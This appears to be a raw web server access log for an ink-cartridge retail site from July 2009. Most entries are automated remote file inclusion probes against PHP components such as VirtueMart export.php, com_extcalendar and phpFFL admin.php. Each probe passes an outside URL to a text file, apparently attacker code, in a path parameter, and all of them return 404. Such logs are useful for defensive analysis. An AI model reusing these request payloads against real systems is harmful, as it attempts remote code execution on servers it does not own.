94.142.128.140 - - [01/Jul/2009:17:05:52 -0700] "GET / HTTP/1.0" 200 2116 "http://site.inkjetcartridge.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; (R1 1.5))" "site.inkjetcartridge.com"
122.153.28.140 - - [01/Jul/2009:17:06:48 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
122.153.28.140 - - [01/Jul/2009:17:06:53 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
122.153.28.140 - - [01/Jul/2009:17:06:53 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
72.230.58.1 - - [01/Jul/2009:17:09:31 -0700] "GET /email/images/inkmail13_04.gif HTTP/1.1" 200 17176 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "site.inkjetcartridge.com"
67.185.53.35 - - [01/Jul/2009:17:09:53 -0700] "GET /email/images/inkmail13_01.gif HTTP/1.1" 200 6009 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; InfoPath.2; MSOffice 12)" "site.inkjetcartridge.com"
67.185.53.35 - - [01/Jul/2009:17:09:54 -0700] "GET /email/images/inkmail13_06.gif HTTP/1.1" 200 26778 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; InfoPath.2; MSOffice 12)" "site.inkjetcartridge.com"
122.153.28.140 - - [01/Jul/2009:17:12:32 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
122.153.28.140 - - [01/Jul/2009:17:12:32 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
122.153.28.140 - - [01/Jul/2009:17:12:32 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
65.55.106.214 - - [01/Jul/2009:17:13:44 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "site.inkjetcartridge.com"
69.72.208.90 - - [01/Jul/2009:17:14:34 -0700] "GET /logs/access.log///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://getcpn.com/104/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
69.72.208.90 - - [01/Jul/2009:17:14:34 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://getcpn.com/104/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
69.72.208.90 - - [01/Jul/2009:17:14:35 -0700] "GET /logs///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://getcpn.com/104/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
87.118.106.133 - - [01/Jul/2009:17:15:47 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.intakkabili.altervista.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
87.118.106.133 - - [01/Jul/2009:17:15:47 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.intakkabili.altervista.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
87.118.106.133 - - [01/Jul/2009:17:15:48 -0700] "GET /logs/access.log%20%20/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.intakkabili.altervista.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
87.118.106.133 - - [01/Jul/2009:17:16:17 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.intakkabili.altervista.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
87.118.106.133 - - [01/Jul/2009:17:16:17 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.intakkabili.altervista.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
87.118.106.133 - - [01/Jul/2009:17:16:17 -0700] "GET /logs/access.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.intakkabili.altervista.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
69.72.208.90 - - [01/Jul/2009:17:18:45 -0700] "GET /logs/access.log%20%20///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://getcpn.com/104/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
72.30.142.250 - - [01/Jul/2009:17:34:31 -0700] "GET /phpbb/viewtopic.php?t=1362 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
208.71.89.180 - - [01/Jul/2009:17:42:36 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.stmaryofthecataract.com/images/save.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "site.inkjetcartridge.com"
208.71.89.180 - - [01/Jul/2009:17:54:19 -0700] "GET /logs/access.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.stmaryofthecataract.com/images/save.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "site.inkjetcartridge.com"
208.71.89.180 - - [01/Jul/2009:17:54:19 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.stmaryofthecataract.com/images/save.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "site.inkjetcartridge.com"
173.23.235.96 - - [01/Jul/2009:18:03:05 -0700] "GET /boomerang_images/lostminerranch.gif HTTP/1.1" 200 9260 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" "site.inkjetcartridge.com"
173.23.235.96 - - [01/Jul/2009:18:03:05 -0700] "GET /boomerang_images/roi.gif HTTP/1.1" 200 8343 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" "site.inkjetcartridge.com"
173.23.235.96 - - [01/Jul/2009:18:03:05 -0700] "GET /boomerang_images/mini2.gif HTTP/1.1" 200 7156 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" "site.inkjetcartridge.com"
173.23.235.96 - - [01/Jul/2009:18:03:05 -0700] "GET /boomerang_images/magma.gif HTTP/1.1" 200 8881 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" "site.inkjetcartridge.com"
173.23.235.96 - - [01/Jul/2009:18:03:06 -0700] "GET /boomerang_images/profly.gif HTTP/1.1" 200 10139 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" "site.inkjetcartridge.com"
173.23.235.96 - - [01/Jul/2009:18:03:06 -0700] "GET /boomerang_images/funfly.gif HTTP/1.1" 200 23033 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" "site.inkjetcartridge.com"
208.71.89.180 - - [01/Jul/2009:18:07:01 -0700] "GET /logs/access_090331.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.stmaryofthecataract.com/images/save.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "site.inkjetcartridge.com"
218.232.105.116 - - [01/Jul/2009:18:08:15 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
218.232.105.116 - - [01/Jul/2009:18:08:15 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
218.232.105.116 - - [01/Jul/2009:18:08:15 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
218.232.105.116 - - [01/Jul/2009:18:08:39 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
218.232.105.116 - - [01/Jul/2009:18:08:39 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
218.232.105.116 - - [01/Jul/2009:18:08:39 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
211.255.23.47 - - [01/Jul/2009:18:21:29 -0700] "GET /logs/access.log//skin/ggambo7002_board/write.php?dir=http://www.castandcatch.com/forum/phpBB3/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "site.inkjetcartridge.com"
211.255.23.47 - - [01/Jul/2009:18:21:53 -0700] "GET /logs//skin/ggambo7002_board/write.php?dir=http://www.castandcatch.com/forum/phpBB3/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "site.inkjetcartridge.com"
211.255.23.47 - - [01/Jul/2009:18:21:53 -0700] "GET /skin/ggambo7002_board/write.php?dir=http://www.castandcatch.com/forum/phpBB3/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "site.inkjetcartridge.com"
72.30.142.250 - - [01/Jul/2009:18:24:07 -0700] "GET /phpbb/viewtopic.php?p=2058 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
218.232.105.116 - - [01/Jul/2009:18:26:49 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
218.232.105.116 - - [01/Jul/2009:18:26:49 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
218.232.105.116 - - [01/Jul/2009:18:26:49 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
218.232.105.116 - - [01/Jul/2009:18:26:53 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
218.232.105.116 - - [01/Jul/2009:18:26:53 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
218.232.105.116 - - [01/Jul/2009:18:26:53 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
218.232.105.116 - - [01/Jul/2009:18:35:01 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
218.232.105.116 - - [01/Jul/2009:18:35:20 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
87.118.116.72 - - [01/Jul/2009:18:52:56 -0700] "GET /logs/access.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.st-computer.biz/media/system/css/idev.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.821" "site.inkjetcartridge.com"
87.118.116.72 - - [01/Jul/2009:18:52:56 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.st-computer.biz/media/system/css/idev.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.821" "site.inkjetcartridge.com"
87.118.116.72 - - [01/Jul/2009:18:52:56 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.st-computer.biz/media/system/css/idev.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.821" "site.inkjetcartridge.com"
195.34.78.110 - - [01/Jul/2009:18:55:17 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [01/Jul/2009:18:55:17 -0700] "GET /logs/access.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [01/Jul/2009:18:55:17 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [01/Jul/2009:18:55:40 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [01/Jul/2009:18:55:40 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [01/Jul/2009:18:55:40 -0700] "GET /logs/access.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
217.125.38.117 - - [01/Jul/2009:18:57:57 -0700] "GET /logs/access.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
217.125.38.117 - - [01/Jul/2009:18:57:57 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
217.125.38.117 - - [01/Jul/2009:18:57:58 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [01/Jul/2009:19:01:17 -0700] "GET /logs/access.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [01/Jul/2009:19:01:20 -0700] "GET /logs/access.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
217.125.38.117 - - [01/Jul/2009:19:05:11 -0700] "GET /logs/access.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
87.118.116.72 - - [01/Jul/2009:19:06:32 -0700] "GET /logs/access.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.st-computer.biz/media/system/css/idev.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.821" "site.inkjetcartridge.com"
87.118.116.72 - - [01/Jul/2009:19:06:32 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.st-computer.biz/media/system/css/idev.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.821" "site.inkjetcartridge.com"
87.118.116.72 - - [01/Jul/2009:19:06:32 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.st-computer.biz/media/system/css/idev.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.821" "site.inkjetcartridge.com"
71.58.136.7 - - [01/Jul/2009:19:07:09 -0700] "GET /email/images/inkmail13_06.gif HTTP/1.1" 200 26778 "http://sz0026.wc.mail.comcast.net/zimbra/mail" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)" "site.inkjetcartridge.com"
82.194.87.219 - - [01/Jul/2009:19:09:43 -0700] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.laubrotel.com/editor/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "site.inkjetcartridge.com"
87.118.116.72 - - [01/Jul/2009:19:10:57 -0700] "GET /logs/access.log%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.st-computer.biz/media/system/css/idev.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.821" "site.inkjetcartridge.com"
82.194.87.219 - - [01/Jul/2009:19:15:50 -0700] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.laubrotel.com/editor/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "site.inkjetcartridge.com"
82.194.87.219 - - [01/Jul/2009:19:17:16 -0700] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.laubrotel.com/editor/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "site.inkjetcartridge.com"
82.194.87.219 - - [01/Jul/2009:19:18:47 -0700] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.laubrotel.com/editor/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "site.inkjetcartridge.com"
82.194.87.219 - - [01/Jul/2009:19:19:58 -0700] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.laubrotel.com/editor/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "site.inkjetcartridge.com"
65.23.158.226 - - [01/Jul/2009:19:24:00 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.jv-deals.com/wordpress/wp-content/themes/AllBlue/AllBlue/images/dump1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
65.23.158.226 - - [01/Jul/2009:19:24:00 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.jv-deals.com/wordpress/wp-content/themes/AllBlue/AllBlue/images/dump1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
65.23.158.226 - - [01/Jul/2009:19:24:00 -0700] "GET /logs/access.log%20%20/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.jv-deals.com/wordpress/wp-content/themes/AllBlue/AllBlue/images/dump1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
65.23.158.226 - - [01/Jul/2009:19:24:00 -0700] "GET /logs/access.log%20%20/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.jv-deals.com/wordpress/wp-content/themes/AllBlue/AllBlue/images/dump1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
65.23.158.226 - - [01/Jul/2009:19:24:00 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.jv-deals.com/wordpress/wp-content/themes/AllBlue/AllBlue/images/dump1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
65.23.158.226 - - [01/Jul/2009:19:24:00 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.jv-deals.com/wordpress/wp-content/themes/AllBlue/AllBlue/images/dump1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
96.235.16.110 - - [01/Jul/2009:19:32:23 -0700] "GET /email/images/inkmail13_01.gif HTTP/1.1" 200 6009 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322; MSOffice 12)" "site.inkjetcartridge.com"
65.55.106.227 - - [01/Jul/2009:19:55:58 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "site.inkjetcartridge.com"
85.13.136.148 - - [01/Jul/2009:20:15:07 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.lightingmania.com/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
85.13.136.148 - - [01/Jul/2009:20:15:07 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.lightingmania.com/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
85.13.136.148 - - [01/Jul/2009:20:15:22 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.lightingmania.com/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
92.50.143.90 - - [01/Jul/2009:20:16:23 -0700] "GET /toolbar.php?dirDepth=http://eng.nevskydvor.ru/php/id1.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "site.inkjetcartridge.com"
212.91.227.172 - - [01/Jul/2009:20:22:02 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.defendersofthebalance.com/includes/db/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
212.91.227.172 - - [01/Jul/2009:20:22:02 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.defendersofthebalance.com/includes/db/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
212.91.227.172 - - [01/Jul/2009:20:22:02 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.defendersofthebalance.com/includes/db/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [01/Jul/2009:20:27:26 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [01/Jul/2009:20:27:26 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [01/Jul/2009:20:27:27 -0700] "GET /logs/access.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [01/Jul/2009:20:27:28 -0700] "GET /logs/access.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [01/Jul/2009:20:27:28 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [01/Jul/2009:20:27:28 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [01/Jul/2009:20:27:47 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
